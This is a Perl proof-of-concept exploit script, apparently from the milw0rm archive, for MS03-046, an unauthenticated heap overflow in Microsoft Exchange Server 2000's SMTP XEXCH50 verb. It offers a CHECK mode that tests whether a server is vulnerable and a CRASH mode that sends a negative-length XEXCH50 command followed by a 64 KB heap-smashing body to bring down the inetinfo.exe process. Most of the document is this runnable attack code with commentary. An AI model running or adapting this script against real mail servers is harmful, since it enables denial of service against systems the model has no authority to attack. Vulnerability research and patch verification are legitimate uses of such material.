Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046)




#!/usr/bin/perl -w
##################

##
# ms03-046.pl - hdm metasploit com
# This vulnerability allows a remote unauthenticated user to overwrite big chunks
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be
# just about any size, the actual code that crashes varies widely with each request.
# During the analysis process, numerous combinations of request size, concurrent
# requests, pre-allocations, and alternate trigger routes were examined and not a
# single duplicate of location and data offset was discovered. Hopefully the magic
# combination of data, size, and setup will be found to allow this bug to be reliably
# exploited.

# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

# Command line: <host> [CHECK|CRASH]; a missing host prints the usage text
# and exits, a missing mode defaults to the read-only CHECK probe.  These
# three file-scoped lexicals are read by check(), crash() and SMTP().
my $host = shift(@ARGV) || usage();
my $mode = shift(@ARGV) || "CHECK";
my $port = 25;


# Dispatch on the upper-cased mode; each handler ends the process itself,
# so reaching usage() below means no recognised mode was given.
my %handler_for = (
    CHECK => \&check,
    CRASH => \&crash,
);
my $handler = $handler_for{ uc($mode) };
$handler->() if $handler;

usage();


sub check
{
    # CHECK mode: open an SMTP session and report whether the server accepts
    # the XEXCH50 verb without any prior authentication.  Every path ends in
    # exit(0), so the outcome is conveyed only by the printed message, never
    # by the exit status.
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # Small, well-formed arguments: this probe only asks whether the verb is
    # accepted and then closes the session without sending any body.
    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close ($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    # (so an XEXCH50 on an unauthenticated session is the wire-level
    # indicator a server-side log review or detection rule would key on).
    # If the server drops the connection, $res is undef: the match warns
    # under -w but still takes this branch.
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";

    exit(0);
}


sub crash
{
    # CRASH mode: the denial-of-service trigger described in the file
    # header.  Sends the malformed XEXCH50 request followed by the body,
    # then exits 0 without inspecting any further reply from the server.
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;

    # a patched server only allows XEXCH50 after NTLM authentication
    # ($res is undef if the server drops the session; that warns under -w
    # but still lands in this branch)
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    # 65536 bytes ("META" x 16384); the server's response to the body is
    # never read, so nothing here reports whether the crash occurred.
    print "[*] Sending massive heap-smashing string...\n";
    print $s ("META" x 16384);

    # sometimes a second connection is required to trigger the crash
    # (its return value is not checked; $s is simply overwritten and the
    # first socket is only closed when the process exits)
    $s = SMTP($host, $port);

    exit(0);
}


sub usage
{
    # Print the command-line synopsis to STDERR and terminate.  Note the
    # exit status is 0 even though this is the help/error path.
    my $synopsis = "Usage: $0 <host> [CHECK|CRASH]\n";
    print {*STDERR} $synopsis;
    exit(0);
}

sub SMTP
{
    # Connect to host:port, read the banner and walk the HELO / MAIL FROM /
    # RCPT TO preamble.  Returns the connected socket, or undef when the
    # connection fails, the peer closes the session at any step, or the
    # banner does not mention Microsoft.
    my ($host, $port) = @_;

    my $sock = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
    ) or return(undef);

    # Greeting banner; undef here means the peer closed immediately.
    my $banner = <$sock>;
    return undef if !$banner;

    # Plain substring test on the banner: anything that does not advertise
    # itself as Microsoft is refused up front.
    if ($banner !~ /Microsoft/)
    {
        chomp($banner);
        print STDERR "[*] This does not look like an exchange server: $banner\n";
        return(undef);
    }

    # Envelope preamble; each step only requires that *some* reply line
    # arrives, the reply code itself is not examined.
    my @preamble = (
        "HELO X\r\n",
        "MAIL FROM: DoS\r\n",
        "RCPT TO: Administrator\r\n",
    );
    for my $command (@preamble)
    {
        print $sock $command;
        my $reply = <$sock>;
        return undef if !$reply;
    }

    return($sock);
}


# milw0rm.com [2003-10-22]